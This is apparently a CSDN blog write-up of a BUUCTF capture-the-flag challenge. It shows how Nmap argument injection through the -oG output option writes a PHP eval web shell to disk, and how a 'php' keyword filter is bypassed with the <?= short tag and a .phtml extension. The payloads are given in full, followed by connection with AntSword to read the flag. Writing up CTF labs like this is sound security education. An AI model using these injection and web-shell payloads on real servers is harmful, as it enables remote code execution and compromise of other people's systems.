web buuctf [网鼎杯 2020 朱雀组]Nmap1

"本文介绍了如何通过NAMP注入技巧,利用<?=和phtml绕过PHP过滤,成功上传恶意脚本并获取flag。详细步骤包括构造payload、绕过过滤和最终获取flag {fb8e3637-ac42-456c-8caf-d1470e670fe5}
摘要由CSDN通过智能技术生成

考点:namp注入

参考web buuctf [BUUCTF 2018]Online Tool1_半杯雨水敬过客的博客-CSDN博客

1.

 2.利用NMAP里的-oG命令实现代码的写入,那我们这里就可以尝试构造payload,来利用‘拼接,写入我们想要的shell文件

我们直接用那道buu里的payload:

' <?php eval($_POST["cmd"]);?> -oG zhuque.php '

注入之后发现存在过滤,fuzz,过滤了php

(1)利用<?=来代替<?php进行绕过
(2)利用phtml来代替shell.php的文件后缀

payload:

' <?= eval($_POST["cmd"]);?> -oG zhuque.phtml '

 上传成功

3.打开蚁剑

 在根目录下找到flag

 flag{fb8e3637-ac42-456c-8caf-d1470e670fe5}

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值